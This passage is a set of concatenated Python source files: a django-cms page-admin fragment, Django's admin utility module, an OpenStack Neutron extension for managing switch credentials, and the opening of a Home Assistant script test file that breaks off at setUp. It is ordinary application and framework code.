    if page and not page.has_change_permission(request):
        raise Http404
    if page and settings.CMS_MODERATOR and page.is_under_moderation():
        # delete the draft version of the plugin
        plugin.delete()
        # set the page to require approval and save
        page.moderator_state = Page.MODERATOR_NEED_APPROVEMENT
        page.save()
    else:
        plugin.delete_with_public()
    plugin_name = unicode(plugin_pool.get_plugin(plugin.plugin_type).name)
    comment = ugettext(u"%(plugin_name)s plugin at position %(position)s in %(placeholder)s was deleted.") % {
        'plugin_name': plugin_name,
        'position': plugin.position,
        'placeholder': plugin.placeholder,
    }
    if page and 'reversion' in settings.INSTALLED_APPS:
        helpers.make_revision_with_plugins(page)
        reversion.revision.user = request.user
        reversion.revision.comment = comment
    return HttpResponse("%s,%s" % (plugin_id, comment))
def change_moderation(self, request, page_id):
    """Called when user clicks on a moderation checkbox in tree view, so if he
    wants to add/remove/change moderation required by him. Moderate is sum of
    mask values (page / children / descendants). POST only.
    """
    from cms.models.moderatormodels import MASK_PAGE, MASK_CHILDREN, MASK_DESCENDANTS
    if request.method != 'POST':
        # Bug fix: instantiate HttpResponseNotAllowed with the allowed
        # methods instead of returning the bare class.
        return HttpResponseNotAllowed(['POST'])
    page = get_object_or_404(Page, id=page_id)
    moderate = request.POST.get('moderate', None)
    if moderate is not None and page.has_moderate_permission(request):
        try:
            moderate = int(moderate)
        except (TypeError, ValueError):
            # Bug fix: catch only conversion failures instead of a bare
            # except that would also swallow KeyboardInterrupt/SystemExit.
            moderate = 0
        if moderate == 0:
            # kill record with moderation which equals zero
            try:
                page.pagemoderator_set.get(user=request.user).delete()
            except ObjectDoesNotExist:
                pass
            return admin_utils.render_admin_menu_item(request, page)
        elif moderate <= MASK_PAGE + MASK_CHILDREN + MASK_DESCENDANTS:
            page_moderator, created = page.pagemoderator_set.get_or_create(user=request.user)
            # split value to attributes
            page_moderator.set_decimal(moderate)
            page_moderator.save()
            return admin_utils.render_admin_menu_item(request, page)
    raise Http404
def lookup_allowed(self, key, *args, **kwargs):
    """Always permit filtering on site__exact; defer everything else."""
    if key != 'site__exact':
        return super(PageAdmin, self).lookup_allowed(key, *args, **kwargs)
    return True
# Apply the configurable fieldsets and list filters to PageAdmin, then
# register the Page model with the default admin site.
contribute_fieldsets(PageAdmin)
contribute_list_filter(PageAdmin)
admin.site.register(Page, PageAdmin)
|
|
from __future__ import unicode_literals
import datetime
import decimal
from collections import defaultdict
from django.contrib.auth import get_permission_codename
from django.core.exceptions import FieldDoesNotExist
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.deletion import Collector
from django.db.models.sql.constants import QUERY_TERMS
from django.forms.forms import pretty_name
from django.utils import formats, six, timezone
from django.utils.encoding import force_str, force_text, smart_text
from django.utils.html import format_html
from django.utils.text import capfirst
from django.utils.translation import ungettext
def lookup_needs_distinct(opts, lookup_path):
    """
    Returns True if 'distinct()' should be used to query the given lookup path.
    """
    parts = lookup_path.split('__')
    # A trailing query term (e.g. "icontains") is not a field -- drop it.
    if parts[-1] in QUERY_TERMS:
        parts = parts[:-1]
    # Walk the relations; a many-to-many hop anywhere means duplicate rows.
    for part in parts:
        field = opts.get_field(part)
        if not hasattr(field, 'get_path_info'):
            continue
        # Relation: follow it so the next field is looked up on the far side.
        path_info = field.get_path_info()
        opts = path_info[-1].to_opts
        if any(step.m2m for step in path_info):
            return True
    return False
def prepare_lookup_value(key, value):
    """
    Returns a lookup value prepared to be used in queryset filtering.
    """
    # A trailing __in means a comma-separated list of values.
    if key.endswith('__in'):
        return value.split(',')
    # A trailing __isnull maps '', 'false' and '0' to False, anything
    # else to True.
    if key.endswith('__isnull'):
        return value.lower() not in ('', 'false', '0')
    return value
def quote(s):
    """
    Ensure that primary key values do not confuse the admin URLs by escaping
    any '/', '_' and ':' and similarly problematic characters.
    Similar to urllib.quote, except that the quoting is slightly different so
    that it doesn't get automatically unquoted by the Web browser.
    """
    if not isinstance(s, six.string_types):
        return s
    problematic = ':/_#?;@&=+$,"[]<>%\\'
    return ''.join(
        '_%02X' % ord(ch) if ch in problematic else ch
        for ch in s
    )
def unquote(s):
    """
    Undo the effects of quote(). Based heavily on urllib.unquote().

    Each '_' introduces a two-hex-digit escape ('_5F' -> '_'); chunks that
    do not parse as hex are passed through with their '_' restored.
    """
    # Cleanup: the original shadowed the builtin `list` and used pointless
    # local aliases (mychr/myatoi/myappend); same algorithm, plain names.
    parts = s.split('_')
    res = [parts[0]]
    for item in parts[1:]:
        if item[1:2]:
            try:
                res.append(chr(int(item[:2], 16)) + item[2:])
            except ValueError:
                # Not a valid hex escape -- keep the underscore literally.
                res.append('_' + item)
        else:
            res.append('_' + item)
    return "".join(res)
def flatten(fields):
    """Returns a list which is a single level of flattening of the
    original list."""
    result = []
    for item in fields:
        if isinstance(item, (list, tuple)):
            result += list(item)
        else:
            result.append(item)
    return result
def flatten_fieldsets(fieldsets):
    """Returns a list of field names from an admin fieldsets structure."""
    names = []
    # Each fieldset is a (name, options) pair; only 'fields' matters here.
    for _name, options in fieldsets:
        names += flatten(options['fields'])
    return names
def get_deleted_objects(objs, opts, user, admin_site, using):
    """
    Find all objects related to ``objs`` that should also be deleted. ``objs``
    must be a homogeneous iterable of objects (e.g. a QuerySet).
    Returns a nested list of strings suitable for display in the
    template with the ``unordered_list`` filter.

    Also returns the per-model deletion counts, the set of verbose names
    the user lacks delete permission for, and the PROTECT-ed objects.
    NOTE(review): the ``opts`` parameter is unused here (the inner callback
    shadows it) -- apparently kept for caller compatibility.
    """
    collector = NestedObjects(using=using)
    collector.collect(objs)
    perms_needed = set()
    def format_callback(obj):
        # Render one collected object: a change-page link when the model is
        # registered in this admin site and the URL reverses, else plain text.
        has_admin = obj.__class__ in admin_site._registry
        opts = obj._meta
        no_edit_link = '%s: %s' % (capfirst(opts.verbose_name),
                                   force_text(obj))
        if has_admin:
            try:
                admin_url = reverse('%s:%s_%s_change'
                                    % (admin_site.name,
                                       opts.app_label,
                                       opts.model_name),
                                    None, (quote(obj._get_pk_val()),))
            except NoReverseMatch:
                # Change url doesn't exist -- don't display link to edit
                return no_edit_link
            # Side effect: record models the user may not delete.
            p = '%s.%s' % (opts.app_label,
                           get_permission_codename('delete', opts))
            if not user.has_perm(p):
                perms_needed.add(opts.verbose_name)
            # Display a link to the admin page.
            return format_html('{}: <a href="{}">{}</a>',
                               capfirst(opts.verbose_name),
                               admin_url,
                               obj)
        else:
            # Don't display link to edit, because it either has no
            # admin or is edited inline.
            return no_edit_link
    to_delete = collector.nested(format_callback)
    protected = [format_callback(obj) for obj in collector.protected]
    return to_delete, collector.model_count, perms_needed, protected
class NestedObjects(Collector):
    """Deletion collector that additionally records the cascade graph so the
    related objects can be shown as a nested list on the confirmation page.
    """
    def __init__(self, *args, **kwargs):
        super(NestedObjects, self).__init__(*args, **kwargs)
        self.edges = {} # {from_instance: [to_instances]}
        self.protected = set()
        self.model_count = defaultdict(int)
    def add_edge(self, source, target):
        # Record that deleting ``source`` cascades to ``target``
        # (source is None for root objects).
        self.edges.setdefault(source, []).append(target)
    def collect(self, objs, source=None, source_attr=None, **kwargs):
        for obj in objs:
            if source_attr and not source_attr.endswith('+'):
                # Resolve the accessor back to the parent instance so the
                # edge points from parent to child.
                related_name = source_attr % {
                    'class': source._meta.model_name,
                    'app_label': source._meta.app_label,
                }
                self.add_edge(getattr(obj, related_name), obj)
            else:
                self.add_edge(None, obj)
            self.model_count[obj._meta.verbose_name_plural] += 1
        try:
            return super(NestedObjects, self).collect(objs, source_attr=source_attr, **kwargs)
        except models.ProtectedError as e:
            # Remember PROTECT-ed objects instead of aborting collection.
            self.protected.update(e.protected_objects)
    def related_objects(self, related, objs):
        qs = super(NestedObjects, self).related_objects(related, objs)
        # Pre-fetch the relation so formatting the tree does not re-query.
        return qs.select_related(related.field.name)
    def _nested(self, obj, seen, format_callback):
        # Depth-first expansion of one node; ``seen`` breaks cycles.
        if obj in seen:
            return []
        seen.add(obj)
        children = []
        for child in self.edges.get(obj, ()):
            children.extend(self._nested(child, seen, format_callback))
        if format_callback:
            ret = [format_callback(obj)]
        else:
            ret = [obj]
        if children:
            ret.append(children)
        return ret
    def nested(self, format_callback=None):
        """
        Return the graph as a nested list.
        """
        seen = set()
        roots = []
        for root in self.edges.get(None, ()):
            roots.extend(self._nested(root, seen, format_callback))
        return roots
    def can_fast_delete(self, *args, **kwargs):
        """
        We always want to load the objects into memory so that we can display
        them to the user in confirm page.
        """
        return False
def model_format_dict(obj):
    """
    Return a `dict` with keys 'verbose_name' and 'verbose_name_plural',
    typically for use with string formatting.
    `obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
    """
    # Normalize obj down to an Options instance.
    if isinstance(obj, (models.Model, models.base.ModelBase)):
        opts = obj._meta
    elif isinstance(obj, models.query.QuerySet):
        opts = obj.model._meta
    else:
        opts = obj
    return dict(
        verbose_name=force_text(opts.verbose_name),
        verbose_name_plural=force_text(opts.verbose_name_plural),
    )
def model_ngettext(obj, n=None):
    """
    Return the appropriate `verbose_name` or `verbose_name_plural` value for
    `obj` depending on the count `n`.
    `obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
    If `obj` is a `QuerySet` instance, `n` is optional and the length of the
    `QuerySet` is used.
    """
    if isinstance(obj, models.query.QuerySet):
        if n is None:
            n = obj.count()
        obj = obj.model
    names = model_format_dict(obj)
    return ungettext(names["verbose_name"], names["verbose_name_plural"], n or 0)
def lookup_field(name, obj, model_admin=None):
    """Resolve ``name`` against ``obj`` (and optionally ``model_admin``).

    Returns a ``(field, attr, value)`` triple: ``field`` is the model field
    (None for non-field lookups), ``attr`` the resolved callable/attribute
    (None when ``name`` is a real field), and ``value`` the display value.
    """
    opts = obj._meta
    try:
        f = _get_non_gfk_field(opts, name)
    except FieldDoesNotExist:
        # For non-field values, the value is either a method, property or
        # returned via a callable.
        if callable(name):
            attr = name
            value = attr(obj)
        elif (model_admin is not None and
                hasattr(model_admin, name) and
                not name == '__str__' and
                not name == '__unicode__'):
            # A display callable defined on the ModelAdmin.
            attr = getattr(model_admin, name)
            value = attr(obj)
        else:
            # A method, property or plain attribute on the model itself.
            attr = getattr(obj, name)
            if callable(attr):
                value = attr()
            else:
                value = attr
        f = None
    else:
        attr = None
        value = getattr(obj, name)
    return f, attr, value
def _get_non_gfk_field(opts, name):
    """
    For historical reasons, the admin app relies on GenericForeignKeys as being
    "not found" by get_field(). This could likely be cleaned up.
    """
    field = opts.get_field(name)
    # A relation that is many-to-one yet has no related model is a GFK.
    is_generic_fk = (field.is_relation and field.many_to_one
                     and not field.related_model)
    if is_generic_fk:
        raise FieldDoesNotExist()
    return field
def label_for_field(name, model, model_admin=None, return_attr=False):
    """
    Returns a sensible label for a field name. The name can be a callable,
    property (but not created with @property decorator) or the name of an
    object's attribute, as well as a genuine fields. If return_attr is
    True, the resolved attribute (which could be a callable) is also returned.
    This will be None if (and only if) the name refers to a field.
    """
    attr = None
    try:
        field = _get_non_gfk_field(model._meta, name)
        try:
            label = field.verbose_name
        except AttributeError:
            # field is likely a ForeignObjectRel
            label = field.related_model._meta.verbose_name
    except FieldDoesNotExist:
        # Not a model field: fall back to special names, then callables
        # and attributes on the admin or the model.
        if name == "__unicode__":
            label = force_text(model._meta.verbose_name)
            attr = six.text_type
        elif name == "__str__":
            label = force_str(model._meta.verbose_name)
            attr = bytes
        else:
            if callable(name):
                attr = name
            elif model_admin is not None and hasattr(model_admin, name):
                attr = getattr(model_admin, name)
            elif hasattr(model, name):
                attr = getattr(model, name)
            else:
                message = "Unable to lookup '%s' on %s" % (name, model._meta.object_name)
                if model_admin:
                    message += " or %s" % (model_admin.__class__.__name__,)
                raise AttributeError(message)
            # Label precedence: explicit short_description (on the callable
            # or on a property's getter), then a prettified callable name.
            if hasattr(attr, "short_description"):
                label = attr.short_description
            elif (isinstance(attr, property) and
                    hasattr(attr, "fget") and
                    hasattr(attr.fget, "short_description")):
                label = attr.fget.short_description
            elif callable(attr):
                if attr.__name__ == "<lambda>":
                    label = "--"
                else:
                    label = pretty_name(attr.__name__)
            else:
                label = pretty_name(name)
    if return_attr:
        return (label, attr)
    else:
        return label
def help_text_for_field(name, model):
    """Return the help_text of field ``name`` on ``model`` as text, or ''."""
    try:
        field = _get_non_gfk_field(model._meta, name)
    except FieldDoesNotExist:
        # Not a model field (e.g. a callable) -- no help text available.
        return smart_text("")
    return smart_text(getattr(field, 'help_text', ""))
def display_for_field(value, field, empty_value_display):
    """Format ``value`` for admin display according to ``field``'s type,
    falling back to ``empty_value_display`` for None.
    """
    from django.contrib.admin.templatetags.admin_list import _boolean_icon
    # Choice fields display the human-readable choice label.
    if field.flatchoices:
        return dict(field.flatchoices).get(value, empty_value_display)
    # NullBooleanField needs special-case null-handling, so it comes
    # before the general null test.
    elif isinstance(field, models.BooleanField) or isinstance(field, models.NullBooleanField):
        return _boolean_icon(value)
    elif value is None:
        return empty_value_display
    elif isinstance(field, models.DateTimeField):
        return formats.localize(timezone.template_localtime(value))
    elif isinstance(field, (models.DateField, models.TimeField)):
        return formats.localize(value)
    elif isinstance(field, models.DecimalField):
        return formats.number_format(value, field.decimal_places)
    elif isinstance(field, (models.IntegerField, models.FloatField)):
        return formats.number_format(value)
    elif isinstance(field, models.FileField) and value:
        # Link to the stored file.
        return format_html('<a href="{}">{}</a>', value.url, value)
    else:
        return smart_text(value)
def display_for_value(value, empty_value_display, boolean=False):
    """Format an arbitrary ``value`` for admin display (no field available)."""
    from django.contrib.admin.templatetags.admin_list import _boolean_icon
    if boolean:
        return _boolean_icon(value)
    if value is None:
        return empty_value_display
    # datetime must be tested before date (it is a date subclass).
    if isinstance(value, datetime.datetime):
        return formats.localize(timezone.template_localtime(value))
    if isinstance(value, (datetime.date, datetime.time)):
        return formats.localize(value)
    if isinstance(value, six.integer_types + (decimal.Decimal, float)):
        return formats.number_format(value)
    return smart_text(value)
class NotRelationField(Exception):
    """Raised when a field does not point at another model (plain data field)."""
    pass
def get_model_from_relation(field):
    """Return the model that a relational ``field`` points at.

    Raises:
        NotRelationField: if ``field`` has no ``get_path_info`` (i.e. it is
            not a relation).
    """
    if not hasattr(field, 'get_path_info'):
        raise NotRelationField
    path = field.get_path_info()
    return path[-1].to_opts.model
def reverse_field_path(model, path):
    """ Create a reversed field path.

    E.g. Given (Order, "user__groups"),
    return (Group, "user__order").

    Final field must be a related model, not a data field.
    """
    reversed_path = []
    parent = model
    pieces = path.split(LOOKUP_SEP)
    for piece in pieces:
        field = parent._meta.get_field(piece)
        # skip trailing data field if extant:
        if len(reversed_path) == len(pieces) - 1:  # final iteration
            try:
                get_model_from_relation(field)
            except NotRelationField:
                break
        # Field should point to another model
        if field.is_relation and not (field.auto_created and not field.concrete):
            # Concrete forward relation: reverse it through its query name.
            related_name = field.related_query_name()
            parent = field.remote_field.model
        else:
            # Auto-created reverse relation: use the forward field's name.
            related_name = field.field.name
            parent = field.related_model
        # Build the reversed path from the far end back toward ``model``.
        reversed_path.insert(0, related_name)
    return (parent, LOOKUP_SEP.join(reversed_path))
def get_fields_from_path(model, path):
    """ Return list of Fields given path relative to model.

    e.g. (ModelX, "user__groups__name") -> [
        <django.db.models.fields.related.ForeignKey object at 0x...>,
        <django.db.models.fields.related.ManyToManyField object at 0x...>,
        <django.db.models.fields.CharField object at 0x...>,
    ]
    """
    fields = []
    for piece in path.split(LOOKUP_SEP):
        # Each segment resolves against the model reached by the previous
        # field; the first segment resolves against ``model`` itself.
        parent = model if not fields else get_model_from_relation(fields[-1])
        fields.append(parent._meta.get_field(piece))
    return fields
def remove_trailing_data_field(fields):
    """ Discard trailing non-relation field if extant. """
    last = fields[-1]
    try:
        get_model_from_relation(last)
    except NotRelationField:
        # The final field is a plain data field; drop it.
        return fields[:-1]
    return fields
|
|
# Copyright (c) 2016 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.api.v2 import base
from neutron.api.v2 import resource
from neutron import wsgi
from baremetal_network_provisioning.common import constants as const
from baremetal_network_provisioning.common import validators
from baremetal_network_provisioning.db import bm_nw_provision_db as db
from oslo_log import log as logging
from oslo_utils import uuidutils
LOG = logging.getLogger(__name__)
# Attribute map for the ``bnp-credentials`` REST resource.  Each attribute
# declares whether it may be set on POST/PUT, how it is validated, and
# whether it appears in API responses.  The snmpv*/netconf_* attributes
# carry per-protocol access parameters and are checked by the custom
# ``type:access_dict`` validator registered below.
RESOURCE_ATTRIBUTE_MAP = {
    'bnp-credentials': {
        'id': {'allow_post': False, 'allow_put': False,
               'is_visible': True},
        'name': {'allow_post': True, 'allow_put': True,
                 'validate': {'type:string': None},
                 'is_visible': True},
        'snmpv1': {'allow_post': True, 'allow_put': True,
                   'validate': {'type:access_dict': None},
                   'is_visible': True},
        'snmpv2c': {'allow_post': True, 'allow_put': True,
                    'validate': {'type:access_dict': None},
                    'is_visible': True},
        'snmpv3': {'allow_post': True, 'allow_put': True,
                   'validate': {'type:access_dict': None},
                   'is_visible': True},
        'netconf_ssh': {'allow_post': True, 'allow_put': True,
                        'validate': {'type:access_dict': None},
                        'is_visible': True},
        'netconf_soap': {'allow_post': True, 'allow_put': True,
                         'validate': {'type:access_dict': None},
                         'is_visible': True},
    },
}

# Register the custom validator so 'type:access_dict' (used in the map
# above) resolves at validation time.
validator_func = validators.access_parameter_validator
attributes.validators['type:access_dict'] = validator_func
class BNPCredentialController(wsgi.Controller):
    """WSGI Controller for the extension bnp-credential."""

    def _check_admin(self, context):
        """Raise HTTPForbidden unless the request context is admin."""
        reason = _("Only admin can configure Bnp-credential")
        if not context.is_admin:
            raise webob.exc.HTTPForbidden(reason)

    def index(self, request, **kwargs):
        """List all SNMP and NETCONF credentials.

        Query-string parameters (other than 'fields') are passed through to
        the DB layer as filters.  Secret attributes are stripped from the
        response.
        """
        context = request.context
        filters = {}
        creds = []
        req_dict = dict(request.GET)
        # 'fields' only shapes the response view; it is not a DB filter.
        if req_dict and req_dict.get('fields', None):
            req_dict.pop('fields')
        filters = req_dict
        creds = db.get_all_snmp_creds(context, **filters)
        netconf_creds = db.get_all_netconf_creds(context, **filters)
        for i in netconf_creds:
            creds.append(i)
        creds = self._creds_to_show(creds)
        creds_dict = {'bnp_credentials': creds}
        return creds_dict

    def _creds_to_show(self, creds):
        """Return credential dict(s) with all secret attributes removed.

        Accepts either a list of credentials or a single credential and
        returns the same shape.
        """
        attr_list = ['security_name', 'auth_protocol', 'auth_key',
                     'priv_protocol', 'priv_key', 'write_community',
                     'security_level', 'user_name', 'password', 'key_path']
        creds_list = []
        if isinstance(creds, list):
            for cred in creds:
                cred = dict(cred)
                for key in attr_list:
                    if key in cred:
                        cred.pop(key)
                creds_list.append(cred)
            return creds_list
        else:
            cred = dict(creds)
            for key in attr_list:
                if key in cred:
                    cred.pop(key)
            return cred

    def show(self, request, id, **kwargs):
        """Show a single credential (SNMP or NETCONF) by id."""
        context = request.context
        snmp_cred = db.get_snmp_cred_by_id(context, id)
        netconf_cred = db.get_netconf_cred_by_id(context, id)
        if snmp_cred:
            cred = self._creds_to_show(snmp_cred)
        elif netconf_cred:
            cred = self._creds_to_show(netconf_cred)
        else:
            raise webob.exc.HTTPNotFound(
                _("Credential with id=%s does not exist") % id)
        return {const.BNP_CREDENTIAL_RESOURCE_NAME: cred}

    def delete(self, request, id, **kwargs):
        """Delete a credential unless a switch still references it."""
        context = request.context
        self._check_admin(context)
        filters = {'credentials': id}
        switch_exists = db.get_if_bnp_phy_switch_exists(context, **filters)
        if switch_exists:
            raise webob.exc.HTTPConflict(
                _("credential with id=%s is associated with a switch."
                  "Hence can't be deleted.") % id)
        snmp_cred = db.get_snmp_cred_by_id(context, id)
        netconf_cred = db.get_netconf_cred_by_id(context, id)
        if snmp_cred:
            db.delete_snmp_cred_by_id(context, id)
        elif netconf_cred:
            db.delete_netconf_cred_by_id(context, id)
        else:
            raise webob.exc.HTTPNotFound(
                _("Credential with id=%s does not exist") % id)

    def create(self, request, **kwargs):
        """Create a new Credential."""
        context = request.context
        self._check_admin(context)
        body = validators.validate_request(request)
        key_list = ['name', 'snmpv1', 'snmpv2c',
                    'snmpv3', 'netconf_ssh', 'netconf_soap']
        keys = body.keys()
        validators.validate_attributes(keys, key_list)
        # validate_access_parameters returns the single protocol key present.
        protocol = validators.validate_access_parameters(body)
        if protocol in ['snmpv1', 'snmpv2c', 'snmpv3']:
            db_snmp_cred = self._create_snmp_creds(context, body, protocol)
            db_snmp_cred = self._creds_to_show(db_snmp_cred)
            return {const.BNP_CREDENTIAL_RESOURCE_NAME: dict(db_snmp_cred)}
        else:
            db_netconf_cred = self._create_netconf_creds(
                context, body, protocol)
            db_netconf_cred = self._creds_to_show(db_netconf_cred)
            return {const.BNP_CREDENTIAL_RESOURCE_NAME: dict(db_netconf_cred)}

    def _create_snmp_creds(self, context, body, protocol):
        """Create a new SNMP Credential."""
        access_parameters = body.pop(protocol)
        snmp_cred_dict = self._create_snmp_cred_dict()
        # dict.items() instead of the Python 2-only dict.iteritems().
        for key, value in access_parameters.items():
            body[key] = value
        body['protocol_type'] = protocol
        snmp_cred = self._update_dict(body, snmp_cred_dict)
        db_snmp_cred = db.add_bnp_snmp_cred(context, snmp_cred)
        return db_snmp_cred

    def _create_netconf_creds(self, context, body, protocol):
        """Create a new NETCONF Credential."""
        access_parameters = body.pop(protocol)
        netconf_cred_dict = self._create_netconf_cred_dict()
        # dict.items() instead of the Python 2-only dict.iteritems().
        for key, value in access_parameters.items():
            body[key] = value
        body['protocol_type'] = protocol
        netconf_cred = self._update_dict(body, netconf_cred_dict)
        db_netconf_cred = db.add_bnp_netconf_cred(context, netconf_cred)
        return db_netconf_cred

    def _create_snmp_cred_dict(self):
        """Create SNMP credential dict."""
        snmp_cred_dict = {
            'name': None,
            'protocol_type': None,
            'security_name': None,
            'write_community': None,
            'auth_protocol': None,
            'auth_key': None,
            'priv_protocol': None,
            'priv_key': None,
            'security_level': None}
        return snmp_cred_dict

    def _create_netconf_cred_dict(self):
        """Create NETCONF credential dict."""
        netconf_cred_dict = {
            'name': None,
            'protocol_type': None,
            'user_name': None,
            'password': None,
            'key_path': None}
        return netconf_cred_dict

    def check_creds_proto_type(self, switch_creds, id, protocol):
        """Reject updates that would change the credential's protocol type."""
        if not switch_creds or (switch_creds.get('protocol_type')
                                != protocol.lower()):
            raise webob.exc.HTTPBadRequest(
                _("protocol type cannot be updated for the id %s") % id)

    def _update_dict(self, body, cred_dict):
        """Update the existing dict."""
        # Only keys already present in cred_dict are taken from body.
        for key in cred_dict.keys():
            if key in body.keys():
                cred_dict[key] = body[key]
        return cred_dict

    def update(self, request, id, **kwargs):
        """Update an existing credential.

        The body may rename the credential (no protocol key present) or
        update the access parameters of exactly one protocol; the protocol
        type itself can never change.
        """
        context = request.context
        self._check_admin(context)
        body = validators.validate_request(request)
        protocol = validators.validate_access_parameters_for_update(body)
        key_list = ['name', 'snmpv1', 'snmpv2c',
                    'snmpv3', 'netconf_ssh', 'netconf_soap']
        keys = body.keys()
        validators.validate_attributes(keys, key_list)
        if not uuidutils.is_uuid_like(id):
            raise webob.exc.HTTPBadRequest(
                _("Invalid Id"))
        if not protocol:
            # Name-only update: try SNMP first, then NETCONF.
            switch_creds = db.get_snmp_cred_by_id(context, id)
            if switch_creds:
                switch_creds_dict = self._update_dict(body, dict(switch_creds))
                db.update_bnp_snmp_cred_by_id(context, id, switch_creds_dict)
                return switch_creds_dict
            switch_creds = db.get_netconf_cred_by_id(context, id)
            if switch_creds:
                switch_creds_dict = self._update_dict(body, dict(switch_creds))
                db.update_bnp_netconf_cred_by_id(
                    context, id, switch_creds_dict)
                return switch_creds_dict
            raise webob.exc.HTTPNotFound(
                _("Credential with id=%s does not exist") % id)
        elif protocol in [const.SNMP_V1, const.SNMP_V2C]:
            switch_creds = db.get_snmp_cred_by_id(context, id)
            if not switch_creds:
                raise webob.exc.HTTPNotFound(
                    _("Credential with id=%s does not exist") % id)
            self.check_creds_proto_type(switch_creds, id, protocol)
            params = body.pop(protocol)
            # dict.items() instead of the Python 2-only dict.iteritems().
            for key, value in params.items():
                body[key] = value
            creds_dict = self._update_dict(body, dict(switch_creds))
            db.update_bnp_snmp_cred_by_id(context, id, creds_dict)
            return creds_dict
        elif protocol == const.SNMP_V3:
            switch_creds = db.get_snmp_cred_by_id(context, id)
            if not switch_creds:
                raise webob.exc.HTTPNotFound(
                    _("Credential with id=%s does not exist") % id)
            self.check_creds_proto_type(switch_creds, id, protocol)
            params = body.pop(protocol)
            # '^' is boolean XOR on the two membership tests: exactly one of
            # the pair was supplied, which is only allowed when the stored
            # credential already has the other half.
            if ('auth_protocol' in params.keys()) ^ (
                    'auth_key' in params.keys()):
                if (not switch_creds['auth_protocol']) and (
                        not switch_creds['auth_key']):
                    raise webob.exc.HTTPBadRequest(
                        _("auth_protocol and auth_key values does not exist,"
                          " so both has to be provided"))
            if ('priv_protocol' in params.keys()) ^ ('priv_key'
                                                     in params.keys()):
                if (not switch_creds['priv_protocol']) and (
                        not switch_creds['priv_key']):
                    raise webob.exc.HTTPBadRequest(
                        _("priv_protocol and priv_key values does not exist,"
                          " so both has to be provided"))
            for key, value in params.items():
                body[key] = value
            creds_dict = self._update_dict(body, dict(switch_creds))
            db.update_bnp_snmp_cred_by_id(context, id, creds_dict)
            return creds_dict
        elif protocol == const.NETCONF_SOAP:
            switch_creds = db.get_netconf_cred_by_id(context, id)
            if not switch_creds:
                raise webob.exc.HTTPNotFound(
                    _("Credential with id=%s does not exist") % id)
            self.check_creds_proto_type(switch_creds, id, protocol)
            params = body.pop(protocol)
            for key, value in params.items():
                body[key] = value
            creds_dict = self._update_dict(body, dict(switch_creds))
            db.update_bnp_netconf_cred_by_id(context, id, creds_dict)
            return creds_dict
        elif protocol == const.NETCONF_SSH:
            switch_creds = db.get_netconf_cred_by_id(context, id)
            if not switch_creds:
                raise webob.exc.HTTPNotFound(
                    _("Credential with id=%s does not exist") % id)
            self.check_creds_proto_type(switch_creds, id, protocol)
            params = body.pop(protocol)
            # Same pairing rule as SNMPv3: user_name/password must be
            # supplied together when neither is already stored.
            if ('user_name' in params.keys()) ^ ('password' in params.keys()):
                if (not switch_creds['user_name']) and (
                        not switch_creds['password']):
                    raise webob.exc.HTTPBadRequest(
                        _("user_name and password values does not exist, so"
                          " both has to be provided"))
            for key, value in params.items():
                body[key] = value
            creds_dict = self._update_dict(body, dict(switch_creds))
            db.update_bnp_netconf_cred_by_id(context, id, creds_dict)
            return creds_dict
class Bnp_credential(extensions.ExtensionDescriptor):
    """API extension for Baremetal Switch Credential support."""

    @classmethod
    def get_name(cls):
        """Return the human-readable extension name."""
        return "Bnp-Credential"

    @classmethod
    def get_alias(cls):
        """Return the alias used in URLs and extension listings."""
        return "bnp-credential"

    @classmethod
    def get_description(cls):
        """Return a short description of the extension."""
        return ("Abstraction for protocol credentials"
                " for bare metal instance network provisioning")

    @classmethod
    def get_updated(cls):
        """Return the timestamp of the last extension update."""
        return "2016-03-22T00:00:00-00:00"

    def get_resources(self):
        """Build the WSGI resource for the bnp-credentials collection."""
        controller = resource.Resource(BNPCredentialController(),
                                       base.FAULT_MAP)
        extension = extensions.ResourceExtension('bnp-credentials', controller)
        return [extension]

    def get_extended_resources(self, version):
        """Expose the attribute map only for the v2.0 API."""
        return RESOURCE_ATTRIBUTE_MAP if version == "2.0" else {}
|
|
"""The tests for the Script component."""
# pylint: disable=protected-access
import asyncio
import unittest
import pytest
from homeassistant.components import logbook, script
from homeassistant.components.script import DOMAIN, EVENT_SCRIPT_STARTED
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_NAME,
SERVICE_RELOAD,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.core import Context, callback, split_entity_id
from homeassistant.exceptions import ServiceNotFound
from homeassistant.helpers.service import async_get_all_descriptions
from homeassistant.loader import bind_hass
from homeassistant.setup import async_setup_component, setup_component
from tests.async_mock import Mock, patch
from tests.common import get_test_home_assistant
from tests.components.logbook.test_init import MockLazyEventPartialState
# Entity id of the script set up by the legacy tests below.
ENTITY_ID = "script.test"
@bind_hass
def turn_on(hass, entity_id, variables=None, context=None):
    """Turn script on.

    This is a legacy helper method. Do not use it for new tests.
    """
    # A script's service name is the object-id part of its entity id.
    object_id = split_entity_id(entity_id)[1]
    hass.services.call(DOMAIN, object_id, variables, context=context)
@bind_hass
def turn_off(hass, entity_id):
    """Turn script off.

    This is a legacy helper method. Do not use it for new tests.
    """
    hass.services.call(DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def toggle(hass, entity_id):
    """Toggle the script.

    This is a legacy helper method. Do not use it for new tests.
    """
    service_data = {ATTR_ENTITY_ID: entity_id}
    hass.services.call(DOMAIN, SERVICE_TOGGLE, service_data)
@bind_hass
def reload(hass):
    """Reload script component.

    This is a legacy helper method. Do not use it for new tests.
    """
    # Reload is a domain-level service; no service data is required.
    hass.services.call(DOMAIN, SERVICE_RELOAD)
class TestScriptComponent(unittest.TestCase):
    """Test the Script component."""

    # pylint: disable=invalid-name
    def setUp(self):
        """Set up things to be run when tests are started."""
        self.hass = get_test_home_assistant()
        self.addCleanup(self.tear_down_cleanup)

